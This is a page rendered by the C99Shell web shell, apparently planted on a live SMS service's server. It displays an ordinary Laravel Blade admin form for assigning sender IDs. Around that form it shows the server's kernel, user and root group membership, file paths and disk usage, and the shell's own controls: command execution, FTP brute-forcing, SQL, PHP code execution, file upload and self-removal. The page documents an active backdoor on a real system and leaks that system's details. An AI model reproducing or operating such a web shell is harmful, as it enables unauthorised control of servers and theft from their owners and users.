!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/resources/views/admin/customers/   drwxr-xr-x
Free 29.25 GB of 117.98 GB (24.79%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     assign_senderid.blade.php (4.19 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('layouts.admin')

@section('title')
    {{trans('admin.assign_sender_id')}}
@endsection

@section('extra-css')
    <link rel="stylesheet" href="{{asset('plugins/datatables-bs4/css/dataTables.bootstrap4.min.css')}}">
    <link rel="stylesheet" href="{{asset('plugins/datatables-responsive/css/responsive.bootstrap4.min.css')}}">
@endsection

@section('content')
    <!-- Main content -->
    <section class="content">
        <div class="row">
            <div class="col-12">
                <div class="card">
                    <div class="card-header">
                        <h2 class="card-title">{{trans('admin.assign_sender_id')}}</h2>
                    </div>
                    <!-- /.card-header -->
                    <div class="card-body table-body">
                        <form action="{{route('admin.customer.save.assign.senderid')}}" method="post">
                            @csrf
                            <div class="row">
                                <div class="col-md-6">
                                    <label for="">Customers</label>
                                    <select name="customer_id" class="form-control select2" id="">
                                        @if($customers->isNotEmpty())
                                            @foreach($customers as $customer)
                                                <option value="{{$customer->id}}">{{$customer->email}}</option>
                                            @endforeach
                                        @else
                                            <option value="">{{trans('--No Data Available--')}}</option>
                                        @endif
                                    </select>
                                </div>
                                <div class="col-md-6">
                                    <label for="">{{trans('admin.gateway')}}</label>
                                    <select name="dynamic_gateway_id" class="form-control select2" >
                                        @foreach($availableSMSGateway as $gateway)
                                            <option
                                                value="{{$gateway->id}}">{{$gateway->name}}</option>
                                        @endforeach
                                    </select>
                                    <small>
                                        {{trans('admin.sender_id_configure')}}
                                        <a class="text-danger" target="_blank" href="{{route('admin.gateway.index')}}"><b>click here <i class="fas fa-external-link-alt"></i></b></a></small>
                                </div>

                                <div class="col-md-6 mt-3">
                                    <label for="">{{trans('admin.sender_id')}}</label>
                                    <input type="text" class="form-control" name="sender_id"
                                           placeholder="{{trans('admin.enter_sender_id')}}">
                                </div>

                                <div class="col-md-6 mt-3">
                                    <label for="">{{trans('admin.expire_date')}}</label>
                                    <input type="date" value="{{now()->addMonth()->toDateString()}}" name="expire_date"
                                           class="form-control" placeholder="{{trans('admin.enter_expire_date')}}">
                                </div>

                                <div class="col-md-12 mt-3">
                                    <button class="btn btn-primary" type="submit">
                                        {{trans('admin.submit')}}
                                    </button>
                                </div>

                            </div>

                        </form>
                    </div>
                    <!-- /.card-body -->
                </div>
                <!-- /.card -->
            </div>
            <!-- /.col -->
        </div>
        <!-- /.row -->
    </section>
    <!-- /.content -->

@endsection

@section('extra-scripts')
    <script>
        "use strict";
        $('.select2').select2({
            multiple: false
        });
    </script>
@endsection


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--